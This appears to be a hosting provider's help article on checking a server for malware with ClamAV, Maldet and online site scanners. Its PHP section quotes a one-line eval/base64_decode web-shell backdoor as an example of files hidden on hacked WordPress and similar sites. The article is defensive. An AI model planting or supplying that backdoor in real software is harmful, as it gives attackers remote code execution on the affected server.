How can I scan my server for malware infections?

If your server has been compromised or you are observing unusual behaviour on the VPS (Sudden rise in load/performance, SPAM complaints being sent on your behalf). It might be an idea to start examining your server for Malware, Trojans or other malicious threats.

A good approach is to scan your server using ClamAV which comes in the default repository for most Linux distros. However, it's also possible to install it from source. 

ClamAV can be downloaded from the following webpage:
Documentation concerning the installation and various commands are listed here: 

Another helpful tool as an alternative to ClamAV is Maldet (Linux Malware Detect).

Maldet is the same as ClamAV as in it's an open source free to use Malware Scanner for Linux.
Maldet can be downloaded from
Instructions are listed here:

Scanning your website domains with an online malware scanner
There's also a variety of tools at your disposal to scan for possible malware and security threats using one of the following online scanners:

Securi Site Check

WordPress Security Scan: <-- Plugin for Wordpress

PHP Malicious Code Scanner:
OS Commerce appliances (Wordpress, Joomla, Drupal, and custom built sites have all been pestered by the <?php @eval(base64_decode($_GET[q])); ?> hack. In these cases a single php file is uploaded to your or are disguised within php files that look non-threatening (wp-login.php for example). 

You can scan for malicious PHP code on your server using the scanner on the following page:

Was this article helpful?
3 out of 3 found this helpful



Article is closed for comments.

Articles in this section

See more